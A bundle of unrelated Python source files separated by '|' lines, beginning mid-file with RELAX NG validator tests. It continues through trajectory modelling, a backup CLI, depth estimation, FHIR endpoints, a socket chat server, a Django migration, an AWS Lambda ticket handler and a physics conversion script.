m41_1 = start_tag_open_deriv(m3_4, child_0_qn)
m31 = OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))
m32 = EMPTY
m41_2 = apply_after(
partial(flip(after), m32), start_tag_open_deriv(m31, child_0_qn))
assert str(m41_1) == str(m41_2)
m5_1 = start_tag_open_deriv(m31, child_0_qn)
m311 = Element(
Name({'ns': ''}, 'bar'),
EMPTY)
m5_2 = apply_after(
partial(flip(group), choice(OneOrMore(m311), EMPTY)),
start_tag_open_deriv(m311, child_0_qn))
assert str(m5_1) == str(m5_2)
assert str(d4) == str(m4_3)
assert str(child_deriv(schema, doc)) == str(end_tag_deriv(d4))
assert nullable(child_deriv(schema, doc)) is True
TEST_CASES_PATH = os.path.join(os.getcwd(), 'tests', 'test_cases')
@pytest.mark.parametrize("test_dir", sorted(os.listdir(TEST_CASES_PATH)))
def test_jing(test_dir):
if test_dir in ('334', '337'):
return
test_path = os.path.join(TEST_CASES_PATH, test_dir)
os.chdir(test_path)
correct_schemas = []
invalid_schemas = []
valid_xmls = []
invalid_xmls = []
error_messages = {}
for test_file in os.listdir(test_path):
test_file_path = os.path.join(test_path, test_file)
root, ext = os.path.splitext(test_file)
if ext == '.rng':
if root.endswith('i'):
invalid_schemas.append(test_file_path)
elif root.endswith('c'):
correct_schemas.append(test_file_path)
elif ext == '.xml':
if root.endswith('i'):
invalid_xmls.append(test_file_path)
elif root.endswith('v'):
valid_xmls.append(test_file_path)
for correct_schema in correct_schemas:
with open(correct_schema, 'r') as schema_file:
schema_str = ''.join(schema_file.readlines())
print(schema_str)
schema = prang.Schema(schema_file_name=correct_schema)
for valid_xml in valid_xmls:
try:
schema.validate(doc_file_name=valid_xml)
except Exception as e:
with open(valid_xml, 'r') as valid_xml_file:
valid_xml_str = ''.join(valid_xml_file.readlines())
print(valid_xml_str)
print("The exception is ", e)
raise e
for invalid_xml in invalid_xmls:
print("Doing " + invalid_xml)
with pytest.raises(PrangException) as excinfo:
schema.validate(doc_file_name=invalid_xml)
with open(invalid_xml, 'r') as invalid_xml_file:
invalid_xml_str = ''.join(invalid_xml_file.readlines())
print(invalid_xml_str)
print(excinfo.value)
if invalid_xml in error_messages:
assert error_messages[invalid_xml] == str(excinfo.value)
for invalid_schema in invalid_schemas:
print("Doing " + invalid_schema)
with pytest.raises(PrangException):
prang.Schema(schema_file_name=invalid_schema)
with open(invalid_schema, 'r') as invalid_schema_file:
invalid_schema_str = ''.join(invalid_schema_file.readlines())
print(invalid_schema_str)
|
from gp_code.kernels import set_kernel
from gp_code.optimize_parameters import *
from utils.stats_trajectories import trajectory_arclength, trajectory_duration
from utils.manip_trajectories import get_linear_prior_mean
from utils.manip_trajectories import get_data_from_set
from utils.manip_trajectories import goal_center
from utils.stats_trajectories import euclidean_distance, avg_speed, median_speed
from utils.stats_trajectories import truncate
from sklearn.linear_model import LinearRegression, HuberRegressor
from sklearn.linear_model import Ridge
from sklearn.preprocessing import PolynomialFeatures
from sklearn.pipeline import make_pipeline
import logging
import numpy as np
# This structure keeps all the learned data
# about the set of goals
class goal_pairs:
# Constructor
def __init__(self, goals_areas, trainingSet, sigmaNoise=200.0, min_traj_number=5):
self.goals_n = len(goals_areas)
self.goals_areas = goals_areas
self.min_traj_number = min_traj_number
# Observation Noise
self.sigmaNoise = sigmaNoise
# Minimum value for speed to avoid numerical problems
self.epsilon = 0.1
# Flag to know if the pairs of goals have parameters
# that have been learned
self.learned = np.zeros((self.goals_n,self.goals_n),dtype=int)
# Mean length for all pairs of goals
self.medianLengths = np.zeros((self.goals_n,self.goals_n))
self.euclideanDistances = np.zeros((self.goals_n,self.goals_n))
self.units = np.zeros((self.goals_n,self.goals_n))
self.priorTransitions = np.zeros((self.goals_n,self.goals_n))
self.kernelsX = np.empty((self.goals_n,self.goals_n),dtype=object)
self.kernelsY = np.empty((self.goals_n,self.goals_n),dtype=object)
self.speedModels = np.zeros((self.goals_n,self.goals_n),dtype=object)
self.timeTransitionMeans= np.empty((self.goals_n,self.goals_n),dtype=object)
self.timeTransitionStd = np.empty((self.goals_n,self.goals_n),dtype=object)
# Compute the mean lengths
self.compute_median_lengths(trainingSet)
# Compute the distances between pairs of goals (as a nGoalsxnGoals matrix)
self.compute_euclidean_distances()
# Compute the ratios between average path lengths and inter-goal distances
self.compute_distance_unit()
# Computer prior probabispeedRegressorlities between goals
self.compute_prior_transitions(trainingSet)
# Compute transition probabilities between goals
self.compute_time_transitions(trainingSet)
# Compute speed models
self.optimize_speed_models(trainingSet)
# Fills in the matrix with the mean length of the trajectories
def compute_median_lengths(self, trajectories):
# For each pair of goals (gi,gj), compute the mean arc-length
for i in range(self.goals_n):
for j in range(self.goals_n):
if len(trajectories[i][j]) > 0:
arclengths = []
for trajectory in trajectories[i][j]:
tr_arclen = trajectory_arclength(trajectory)
arclengths.append(tr_arclen[-1])
m = np.mean(arclengths)
else:
m = 0
self.medianLengths[i][j] = m
# Fills in the Euclidean distances between goals
def compute_euclidean_distances(self):
for i in range(self.goals_n):
# Take the centroid of the ROI i
p = goal_center(self.goals_areas[i][1:])
for j in range(self.goals_n):
# Take the centroid of the ROI j
q = goal_center(self.goals_areas[j][1:])
d = euclidean_distance(p,q)
self.euclideanDistances[i][j] = d
# For a given goal, determines the closest
def closest(self,start,k):
i1 = 0
d1 = math.inf
for i in range(0,self.goals_n):
if i!=k and self.kernelsX[start][i].optimized and self.euclideanDistances[start][i]<d1:
d1 = self.euclideanDistances[start][i]
i1 = i
return i1
# Computes the ratio between path length and linear path length
# (distance between goals)
def compute_distance_unit(self):
for i in range(self.goals_n):
for j in range(self.goals_n):
if(self.euclideanDistances[i][j] == 0 or self.medianLengths[i][j] == 0):
u = 1.0
else:
# Ratio between mean length and goal-to-goal distance
u = self.medianLengths[i][j]/self.euclideanDistances[i][j]
self.units[i][j] = u
# Fills in the probability transition matrix gi -> gj
def compute_prior_transitions(self,pathMat,epsilon=0.01):
for i in range(self.goals_n):
count = 0.
# Total count of trajectories outgoing from i
for j in range(self.goals_n):
count += len(pathMat[i][j])
for j in range(self.goals_n):
if count == 0:
self.priorTransitions[i][j] = epsilon
else:
val = float(len(pathMat[i][j]))/count
self.priorTransitions[i][j] = max(epsilon,float(truncate(val,8)))
s = np.sum(self.priorTransitions[i])
if s > 0.0 and s < 1.0:
d = truncate(1.0 - s,8)
self.priorTransitions[i][i] += float(d)
# For each pair, optimize speed model
def optimize_speed_models(self,trainingSet):
# For all the trajectories
for i in range(self.goals_n):
for j in range(self.goals_n):
trajSet = trainingSet[i][j]
# Only if we have enough trajectories
if len(trajSet) < self.min_traj_number:
continue
relativeSpeeds = []
lengths = []
for tr in trajSet:
# Times
t = tr[2]
# Average speed
v = avg_speed(tr)+self.epsilon
# Arc lengths
d = trajectory_arclength(tr)
for k in range(1,len(t)):
relativeSpeeds.append(float((d[k]-d[k-1])/(t[k]-t[k-1]))/v)
lengths.append(d[k])
lengths = np.array(lengths).reshape(-1, 1)
relativeSpeeds = np.array(relativeSpeeds)
self.speedModels[i][j]=make_pipeline(PolynomialFeatures(4),LinearRegression())
self.speedModels[i][j].fit(lengths, relativeSpeeds)
# For each pair of goals, realize the optimization of the kernel parameters
def optimize_kernel_parameters(self,kernelType,trainingSet):
# Build the kernel matrices with the default values
self.kernelsX = create_kernel_matrix(kernelType, self.goals_n, self.goals_n)
self.kernelsY = create_kernel_matrix(kernelType, self.goals_n, self.goals_n)
logging.info("Optimizing kernel parameters")
# For every pair of goals (gi, gj)
for i in range(self.goals_n):
for j in range(self.goals_n):
# Get the set of paths that go from i to j
paths = trainingSet[i][j]
# We optimize a GP only if we have enough trajectories
if len(paths) > self.min_traj_number:
start = timeit.default_timer()
# Get the path data as x,y,z (z is arclength)
x,y,l = get_data_from_set(paths)
# Build a kernel with the specified type and initial parameters theta
ker = set_kernel(kernelType)
# Set the linear prior
if self.kernelsX[i][j].linearPrior:
meanX, varX = get_linear_prior_mean(trainingSet[i][j], 'x')
ker.set_linear_prior(meanX[0],meanX[1],varX[0],varX[1])
theta = ker.get_optimizable_parameters()
logging.info("[{:d}][{:d}]".format(i,j))
logging.info("#trajectories: {:d}".format(len(l)))
logging.info("Initial values for the optimizable parameters: {}".format(theta))
# Fit parameters in X
thetaX = fit_parameters(l,x,ker,theta,self.sigmaNoise)
logging.info("Optimized parameters for x: {}".format(thetaX))
self.kernelsX[i][j].set_parameters(ker.get_parameters())
logging.info("Full parameters for x: {}".format(self.kernelsX[i][j].get_parameters()))
# Fit parameters in Y
ker = set_kernel(kernelType)
if self.kernelsY[i][j].linearPrior:
meanY, varY = get_linear_prior_mean(trainingSet[i][j], 'y')
ker.set_linear_prior(meanY[0],meanY[1],varY[0],varY[1])
thetaY = fit_parameters(l,y,ker,theta,self.sigmaNoise)
logging.info("Optimized parameters for y: {}".format(thetaY))
self.kernelsY[i][j].set_parameters(ker.get_parameters())
logging.info("Full parameters for y: {}".format(self.kernelsY[i][j].get_parameters()))
stop = timeit.default_timer()
execution_time = stop - start
logging.info("Parameter optimization done in {:2f} seconds".format(execution_time))
else:
self.kernelsX[i][j] = None
self.kernelsY[i][j] = None
def copyFromClosest(self,start,k):
# When we have no data for a goal, we instantiate one with Parameters equal to the closest one
j = self.closest(start,k)
# Build a kernel with the specified type and initial parameters theta
self.kernelsX[start][k] = set_kernel(self.kernelsX[start][j].type)
# Copying from j
self.kernelsX[start][k].set_parameters(self.kernelsX[start][j].get_parameters())
# TODO: should update the linear term to the line
logging.info("Full parameters for x: {}".format(self.kernelsX[start][k].get_parameters()))
# Copying from j
self.kernelsY[start][k].set_parameters(self.kernelsY[start][j].get_parameters())
logging.info("Full parameters for y: {}".format(self.kernelsY[start][k].get_parameters()))
return j
# Fills in the probability transition matrix
def compute_time_transitions(self, trMat):
for i in range(self.goals_n):
for j in range(self.goals_n):
M, SD = 0, 0
duration = []
if(len(trMat[i][j]) > self.min_traj_number):
for tr in trMat[i][j]:
duration.append(trajectory_duration(tr))
M = np.mean(duration)
SD = np.std(duration)
self.timeTransitionMeans[i][j] = M
self.timeTransitionStd[i][j] = SD
|
import os
from datetime import datetime
from cement import Controller, ex
from cement.utils import fs
from cement.utils.version import get_version_banner
from ..core.version import get_version
from ..core import exc
VERSION_BANNER = """
Lazily Backup Files and Directories %s
%s
""" % (get_version(), get_version_banner())
class Base(Controller):
class Meta:
label = 'base'
# text displayed at the top of --help output
description = 'Lazily Backup Files and Directories'
# text displayed at the bottom of --help output
epilog = 'Usage: dotbak /path/to/file'
# controller level arguments. ex: 'dotbak --version'
arguments = [
### add a version banner
( [ '-v', '--version' ],
{ 'action' : 'version',
'version' : VERSION_BANNER } ),
( [ '-s', '--suffix' ],
{ 'action' : 'store',
'dest' : 'suffix' ,
'help' : 'backup file/dir suffix (extension)' } ),
( [ 'path' ],
{ 'action' : 'store',
'help' : 'path to file/dir to backup' } ),
]
def _clean_path(self, path):
RSTRIP = ['/', '\\']
for char in RSTRIP:
path = self.app.pargs.path.rstrip(char)
res = fs.abspath(path)
return res
def _default(self):
"""Default action if no sub-command is passed."""
path = self._clean_path(self.app.pargs.path)
if self.app.pargs.suffix is not None:
suffix = self.app.pargs.suffix
else:
suffix = self.app.config.get('dotbak', 'suffix')
if self.app.config.get('dotbak', 'timestamps') is True:
timestamp = datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
suffix = f'{suffix}-{timestamp}'
if not os.path.exists(self.app.pargs.path):
raise exc.DotBakError(f'Path does not exist: {path}')
res = fs.backup(path, suffix=suffix)
self.app.log.info(f'Copied {path} -> {res}')
|
import argparse
import tensorflow as tf
import cv2
import matplotlib.pyplot as plt
def monocular_img(img_path):
"""Function to predict for a single image
"""
img = cv2.cvtColor(img_path, cv2.COLOR_BGR2RGB) / 255.0
img_resized = tf.image.resize(img, [256,256], method='bicubic', preserve_aspect_ratio=False)
#img_resized = tf.transpose(img_resized, [2, 0, 1])
img_input = img_resized.numpy()
mean=[0.485, 0.456, 0.406]
std=[0.229, 0.224, 0.225]
img_input = (img_input - mean) / std
reshape_img = img_input.reshape(1,256,256,3)
tensor = tf.convert_to_tensor(reshape_img, dtype=tf.float32)
# load the intel midas model
model = "model\lite-model_midas_v2_1_small_1_lite_1.tflite"
interpreter = tf.lite.Interpreter(model_path=model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
input_shape = input_details[0]['shape']
# inference
interpreter.set_tensor(input_details[0]['index'], tensor)
interpreter.invoke()
output = interpreter.get_tensor(output_details[0]['index'])
output = output.reshape(256, 256)
# output file
prediction = cv2.resize(output, (img.shape[1], img.shape[0]), interpolation=cv2.INTER_CUBIC)
print(" Write image to: output_depth.png")
depth_min = prediction.min()
depth_max = prediction.max()
img_out = (255 * (prediction - depth_min) / (depth_max - depth_min)).astype("uint8")
cv2.imwrite("output_depth.png", img_out)
plt.imshow(img_out)
plt.show()
return img_out
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('img')
args = parser.parse_args()
img_path = cv2.imread(args.img)
mono = monocular_img(img_path)
|
import sys
import json
import os
sys.path.append("../brreg_announce")
from brreg_announce.brreg import Announcements
ann = Announcements()
res = ann.search(
fetch_details=True,
datoFra='01.01.2015',
datoTil='31.12.2015',
id_niva1=51,
id_niva2=56,
#id_niva3=41,
id_region=300,
id_fylke=46,
id_kommune=4601
)
#res = ann.search(
# orgnr=954478696
#)
print('Rows %i' % res['count'])
with open(os.getenv('HOME') + '/konkurser_bergen_med_detaljer_2015.json', 'w') as outfile:
json.dump(res, outfile, ensure_ascii=False)
#endring forretningsadresse: &id_niva1=9&id_niva2=38&id_niva3=41
|
import os
from starlette.applications import Starlette
from starlette.responses import Response
from starlette.endpoints import HTTPEndpoint
from FHIR.utilities import Utilities
create = Starlette()
"""
@api {post} /create/organization Populate a FHIR Organization template with the supplied values
@apiName CreateOrganization
@apiGroup Create
@apiParam {String} id Unique ID of this organization.
"""
@create.route("/Organization")
class Organization(HTTPEndpoint):
async def post(self, request):
return Response("", Utilities.createFHIRResource("Organization", await request.body()), {}, "");
"""
@api {post} /create/practitioner Populate a FHIR Practitioner template with the supplied values
@apiName CreatePractitioner
@apiGroup Create
@apiParam {String} id Unique ID of this practitioner.
@apiParam {String} familyName Practitioner family name.
@apiParam {String} givenName Practitioner given name.
"""
@create.route("/Practitioner")
class Practitioner(HTTPEndpoint):
async def post(self, request):
return Response("", Utilities.createFHIRResource("Practitioner", await request.body()), {}, "");
"""
@api {post} /create/patient Populate a FHIR Patient template with the supplied values
@apiName CreatePatient
@apiGroup Create
@apiParam {String} id Unique ID of this patient.
@apiParam {String} title Patient title.
@apiParam {String} familyName Patient family name.
@apiParam {String} givenName Patient given name.
@apiParam {String} birthDate Patient date of birth.
@apiParam {String} organizationReference ID of Organization with which the patient is registered.
@apiParam {String} ethnicityCode Code used for patient ethnicity.
@apiParam {String} ethnicityDisplay Text associated with patient ethnicity.
"""
@create.route("/Patient")
class Patient(HTTPEndpoint):
async def post(self, request):
return Response("", Utilities.createFHIRResource("Patient", await request.body()), {}, "");
"""
@api {post} /create/condition Populate a FHIR Condition template with the supplied values
@apiName CreateCondition
@apiGroup Create
@apiParam {String} id Unique ID of this condition.
@apiParam {String} codeSystem Code system used for this condition.
@apiParam {String} code Code used for this condition.
@apiParam {String} display Text associated with this condition.
@apiParam {String} subjectReference The ID of the patient to whom this condition pertains.
@apiParam {String} practitionerReference The ID of the practitioner who diagnosed this condition.
"""
@create.route("/Condition")
class Condition(HTTPEndpoint):
async def post(self, request):
return Response("", Utilities.createFHIRResource("Condition", await request.body()), {}, "");
"""
@api {post} /create/medication Populate a FHIR Medication template with the supplied values
@apiName CreateMedication
@apiGroup Create
@apiParam {String} id Unique ID of this medication.
@apiParam {String} codeSystem Code system used for this medication.
@apiParam {String} code Code used for this medication.
@apiParam {String} display Text associated with this medication.
"""
@create.route("/Medication")
class Medication(HTTPEndpoint):
async def post(self, request):
return Response("", Utilities.createFHIRResource("Medication", await request.body()), {}, "");
"""
@api {post} /create/dispense Populate a FHIR MedicationDispense template with the supplied values
@apiName CreateDispense
@apiGroup Create
@apiParam {String} id Unique ID of this dispense of medication.
@apiParam {String} medicationReference The ID of the medication involved in this dispense.
@apiParam {String} subjectReference The ID of the patient that is taking this medication.
@apiParam {String} practitionerReference The ID of the practitioner that prescribed this medication.
@apiParam {String} organizationReference The ID of the organization the practitioner is associated with.
"""
@create.route("/MedicationDispense")
class Dispense(HTTPEndpoint):
async def post(self, request):
return Response("", Utilities.createFHIRResource("MedicationDispense", await request.body()), {}, "");
@create.route("/Subscription")
class Subscription(HTTPEndpoint):
async def post(self, request):
return Response("", Utilities.createFHIRResource("Subscription", await request.body()), {}, "");
|
"""
Tests for aiohttp-toolbox without [all] installed
"""
import pytest
from pydantic import BaseSettings as PydanticBaseSettings
async def test_create_no_setting():
from atoolbox import create_default_app
from atoolbox.create_app import startup, cleanup
app = await create_default_app()
assert app['settings'] is None
assert 'auth_fernet' not in app
assert 'http_client' not in app
assert len(app.middlewares) == 3
await startup(app)
assert 'http_client' not in app
assert 'pg' not in app
assert 'redis' not in app
await cleanup(app)
async def test_create_setting():
from atoolbox import BaseSettings, create_default_app
from atoolbox.create_app import startup, cleanup
settings = BaseSettings()
app = await create_default_app(settings=settings)
assert app['settings'] is not None
assert 'auth_fernet' not in app
assert 'http_client' not in app
assert len(app.middlewares) == 3
await startup(app)
assert 'http_client' in app
assert 'pg' not in app
assert 'redis' not in app
await cleanup(app)
async def test_create_setting_warnings():
from atoolbox import create_default_app
from atoolbox.create_app import startup, cleanup
class Settings(PydanticBaseSettings):
pg_dsn = 'x'
redis_settings = True
auth_key = True
with pytest.warns(RuntimeWarning) as record:
# can't use normal BaseSettings as parse_redis_settings would raise an error
app = await create_default_app(settings=Settings())
assert len(record) == 2
assert app['settings'] is not None
with pytest.warns(RuntimeWarning) as record:
await startup(app)
assert len(record) == 2
assert 'pg' not in app
assert 'redis' not in app
await cleanup(app)
async def test_settings_defaults_none():
from atoolbox.settings import BaseSettings, RedisSettings
assert RedisSettings.__module__ == 'atoolbox.settings'
s = BaseSettings()
assert s.redis_settings is None
assert s.pg_dsn is None
assert s.auth_key is None
with pytest.raises(RuntimeError):
BaseSettings(redis_settings='redis://localhost:6379')
|
from functools import partial
from pd_lda import pd_lda
import pandas as pd
df = pd.read_pickle('calendar_events_old.df')
df_one = df[:len(df)-20]
df_two = df[len(df)-20:len(df)]
pdlda = pd_lda()
model = pdlda.update_lda(df_one, ['name'])
print model.show_topic(1)
# mymodel = model.copy()
new_model = pdlda.update_lda(df_two, ['name'])
print new_model.show_topic(1)
new_df = pdlda.add_lda_column(df, ['name'], new_model)
class mytest(object):
def __init__(self):
self.x = 33
def realtest(self, index):
return index + self.x
def tester(self):
x = map(self.realtest, range(10))
print x
def func1(self, y, z):
print "first: " + str(y)
print "second: " + str(z)
def test(self):
new = partial(self.func1, 2)
new(3)
|
import socket
from threading import Thread
import threading
class Server:
def __init__(self):
sock.bind(("localhost", 8000))
sock.listen(10)
self.connections = []
def get_socket(self):
while True:
connection, addr = sock.accept()
self.connections.append({"user": connection, "socket": addr})
print("connected:", addr)
Thread(target=self.check_messages, args=(connection,)).start()
def check_messages(self, connection):
while True:
try:
data = connection.recv(4096)
message = str(data.decode())
self.send_message(connection, message)
except Exception as ex:
self.remove_user(connection)
break
def remove_user(self, user):
for connection in self.connections:
if connection["user"] == user:
self.connections.remove(connection)
break
def send_message(self, user, message):
message += "\n"
for connection in self.connections:
if connection["user"] != user:
print(message)
connection["user"].send(message.encode())
if __name__ == "__main__":
sock = socket.socket()
server = Server()
thread = threading.Thread(target=server.get_socket())
thread.start()
thread.join()
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Helptext'
db.create_table('okhelptexts_helptext', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('fulltext', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal('okhelptexts', ['Helptext'])
# Adding model 'Keyword'
db.create_table('okhelptexts_keyword', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('helptext', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['okhelptexts.Helptext'])),
('kw_text', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal('okhelptexts', ['Keyword'])
def backwards(self, orm):
# Deleting model 'Helptext'
db.delete_table('okhelptexts_helptext')
# Deleting model 'Keyword'
db.delete_table('okhelptexts_keyword')
models = {
'okhelptexts.helptext': {
'Meta': {'object_name': 'Helptext'},
'fulltext': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'okhelptexts.keyword': {
'Meta': {'object_name': 'Keyword'},
'helptext': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['okhelptexts.Helptext']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'kw_text': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['okhelptexts']
|
import os
import os.path as path
import subprocess
import unittest
import test_system_common as common
APPARGUMENT_INPUTFILE_SAMPLE_VALUE = r'test_data\311_calls_for_service_requests_all_strings\311_calls_for_service_requests_sample.dat'
APPARGUMENT_INPUTFILE_FULL_VALUE = r'test_data\311_calls_for_service_requests_all_strings\311_calls_for_service_requests.dat'
APPARGUMENT_OUTPUTFOLDER_VALUE =r'test_data\311_calls_for_service_requests_all_strings\output'
APPARGUMENT_LAYPOUTFILE_VALUE =r'layout_repository\311_calls_for_service_requests_all_strings.json'
APPARGUMENT_LOGFOLDER_VALUE =r'test_data\311_calls_for_service_requests_all_strings\log'
VALIDATION_SAMPLE_FOLDER_VALUE = r'test_data\311_calls_for_service_requests_all_strings\validate'
PERFORMANCE_LOGFILE_VALUE =r'test_data\311_calls_for_service_requests_all_strings\performance_log\ebcdic_converter_performance.log'
DATA_SEGMENTS = ["main"]
class TestEbcdicConverter(unittest.TestCase):
@classmethod
def setUpClass(self):
print("\n\nPreparing data... 311 calls for service requests all strings")
codePath = path.dirname(__file__)
self.testEnvironment = common.Setup.getSetupEnvironmentDesctiption(codePath)
self.testType = common.Setup.getSetupTestType(codePath)
inputFile = APPARGUMENT_INPUTFILE_SAMPLE_VALUE
if self.testType==common.TestType.Performance:
inputFile = APPARGUMENT_INPUTFILE_FULL_VALUE
self.appArguments = common.AppArguments(codePath)
self.appArguments.addArgumentValue(self.appArguments.APPARGUMENT_INPUTFILE, inputFile)
self.appArguments.addArgumentValue(self.appArguments.APPARGUMENT_OUTPUTFOLDER, APPARGUMENT_OUTPUTFOLDER_VALUE)
self.appArguments.addArgumentValue(self.appArguments.APPARGUMENT_LAYPOUTFILE, APPARGUMENT_LAYPOUTFILE_VALUE)
self.appArguments.addArgumentValue(self.appArguments.APPARGUMENT_LOGFOLDER, APPARGUMENT_LOGFOLDER_VALUE)
self.appArguments.addArgumentValue(self.appArguments.VALIDATION_SAMPLE_FOLDER, VALIDATION_SAMPLE_FOLDER_VALUE)
self.appArguments.addArgumentValue(self.appArguments.PERFORMANCE_LOGFILE, PERFORMANCE_LOGFILE_VALUE)
#create folder structure
folders = [self.appArguments.APPARGUMENT_OUTPUTFOLDER, self.appArguments.APPARGUMENT_LOGFOLDER, self.appArguments.VALIDATION_SAMPLE_FOLDER, self.appArguments.PERFORMANCE_LOGFILE]
for folderKey in folders:
folderPath = self.appArguments.getArgumentValue(folderKey)
if folderKey==self.appArguments.PERFORMANCE_LOGFILE:
folderPath = path.dirname(folderPath)
if not path.exists(folderPath):
os.mkdir(folderPath)
#delete any already existing output converted files
for segmentName in DATA_SEGMENTS:
filePath = self.appArguments.getOutputFilePath(segmentName)
if path.exists(filePath):
os.remove(filePath)
self.runStats = common.RunStats()
self.runStats.storeCompletedProcess(subprocess.run(args=["python.exe", self.appArguments.getAppArgument(),
self.appArguments.getArgument(self.appArguments.APPARGUMENT_INPUTFILE),
self.appArguments.getArgument(self.appArguments.APPARGUMENT_OUTPUTFOLDER),
self.appArguments.getArgument(self.appArguments.APPARGUMENT_LAYPOUTFILE),
self.appArguments.getArgument(self.appArguments.APPARGUMENT_LOGFOLDER)
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT))
print(self.runStats.getOutput())
if self.testType==common.TestType.Performance:
print()
print("-----------No tests completed. Just reporting performance-----------")
def tearDown(self):
# release resources
pass
@classmethod
def tearDownClass(self):
#store performance info
#write in performance log if no run-time error
self.runStats.savePerformanceLog(self.appArguments, self.testEnvironment)
@unittest.skipIf(common.Setup.getSetupTestType(path.dirname(__file__))==common.TestType.Performance, "Don't run to get performance")
def test_01_ReturnCode(self):
self.assertEqual(self.runStats.getReturnCode(), 0, "Converter returns other than 0 return code")
@unittest.skipIf(common.Setup.getSetupTestType(path.dirname(__file__))==common.TestType.Performance, "Don't run to get performance")
def test_02_NumberRecords(self):
segmentRecordCount = {"main":1000}
for segmentName in DATA_SEGMENTS:
self.assertEqual(self.runStats.getNumberRecords(segmentName), segmentRecordCount[segmentName], "Wrong number of converted records")
@unittest.skipIf(common.Setup.getSetupTestType(path.dirname(__file__))==common.TestType.Performance, "Don't run to get performance")
def test_03_CompareContent(self):
for segmentName in DATA_SEGMENTS:
lineNumber = 0
with open(self.appArguments.getOutputFilePath(segmentName), 'r', encoding="utf-8") as convertedFile:
with open(self.appArguments.getValidationSampleFilePath(segmentName), 'r', encoding="utf-8") as validationSampleFile:
for convertedLine in convertedFile:
validationLine = validationSampleFile.readline()
lineNumber += 1
self.assertEqual(convertedLine, validationLine, "Content doesn't match in line: " + str(lineNumber))
if __name__=="__main__":
unittest.main()
|
"""
This Lambda shows how a staff member managing SupportBot would update the status of a given ticket.
"""
import json
import datetime
import time
import os
import dateutil.parser
import logging
import uuid
import boto3
from boto3.dynamodb.conditions import Key, Attr
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
# --- Main handler ---
def lambda_handler(event, context):
"""
Route the incoming request based on intent.
The JSON body of the request is provided in the event slot.
"""
# By default, treat the user request as coming from the America/New_York time zone.
os.environ['TZ'] = 'America/New_York'
time.tzset()
logger.debug('event.bot.name={}'.format(event['bot']['name']))
logger.debug('event={}'.format(event))
session_attributes = event['sessionAttributes']
if session_attributes is None:
session_attributes = {}
session_attributes['lastIntent'] = event['currentIntent']['name']
# session_attributes['submitterName'] = event['currentIntent']['slots']['first_name']
#before closing the intent, save the case info to a database table
record = getFromDB(event['currentIntent']['slots'])
slots = event['currentIntent']['slots']
if record is None:
response_string = "We were unable to locate support case "+ event['currentIntent']['slots']['ticket_id'] + " please your your case id and try again."
else:
updateStatus(slots['ticket_id'],slots['status'])
response_string = 'We have found and updated your support case. The status is now '+ slots['status'] + ' and was last updated '+ time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(float(record['LastUpdatedDate'])))
return close(session_attributes, 'Fulfilled', {'contentType': 'PlainText','content': response_string})
def getFromDB(slots):
dynamodb = boto3.resource('dynamodb')
db_table_name = os.environ['DynamoDB_Table_Name']
table = dynamodb.Table(db_table_name)
logger.debug("looking up key CaseId="+slots['ticket_id'])
response = table.query(KeyConditionExpression=Key('CaseId').eq(slots['ticket_id']))
logger.debug(str(response))
return response['Items'][0]
def updateStatus(ticketId,updatedStatus):
logger.debug("changing status to="+updatedStatus)
dynamodb = boto3.resource('dynamodb')
db_table_name = os.environ['DynamoDB_Table_Name']
table = dynamodb.Table(db_table_name)
response = table.update_item(
Key={
'CaseId': ticketId,
},
UpdateExpression="set #st = :r, LastUpdatedDate = :l",
ExpressionAttributeValues={
':r':updatedStatus,
':l':str(time.time())
},
ExpressionAttributeNames={
'#st':'Status'
},
ReturnValues="UPDATED_NEW")
logger.debug('finished changing status to='+updatedStatus)
def close(session_attributes, fulfillment_state, message):
response = {
'sessionAttributes': session_attributes,
'dialogAction': {
'type': 'Close',
'fulfillmentState': fulfillment_state,
'message': message
}
}
logger.debug('<<SupportBot>> "Lambda fulfillment function response = \n' + str(response))
return response
|
""" jpv2rel.py
Scripting for jpv2rel conversion runs.
Ex:
JISP16 truncated at relative Nmax20...
% cd nuclthy/data/interaction/jpv-relative/Vrel_JISP16_bare_Jmax4
% python3 ~/projects/shell/script/jpv2rel.py
% mv *_rel.dat ../../rel/JISP16_Nmax20
M. A. Caprio
Department of Physics
University of Notre Dame
2/23/17 (mac): Created.
"""
# generic packages for use below
import math
import os
import sys
# load mcscript
import mcscript
##mcscript.init()
##################################################################
# build task list
##################################################################
# executables
# executable files
projects_root = os.path.join(os.environ["HOME"],"projects")
jpv2rel_executable = os.path.join(projects_root,"shell","libraries","relative","jpv2rel")
# configuration
hw_values = mcscript.utils.value_range(10,30,2.5)
# generate task list
# This should be a list of dictionaries, with keys that your task
# handler function will understand. Then, mcscript will automatically
# add some extra keys to these dictionaries, e.g., a task identifier
# name.
tasks = [
{
"hw" : hw,
"Jmax" : 4,
"Nmax" : 20,
"jpv_filename_template" : "Vrel_JISP16_bare_Jmax{Jmax}.hw{hw:g}",
"rel_filename_template" : "JISP16_Nmax{Nmax}_hw{hw:2.1f}_rel.dat"
}
for hw in hw_values
]
def convert_jpv2rel(task):
""" Invoke jpv2rel.
"""
input_lines = [
"{Nmax} {Jmax}".format(**task),
task["jpv_filename_template"].format(**task),
task["rel_filename_template"].format(**task)
]
mcscript.call(jpv2rel_executable,input_lines=input_lines)
for task in tasks:
convert_jpv2rel(task)
|
# #####################################################################################################################
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance #
# with the License. A copy of the License is located at #
# #
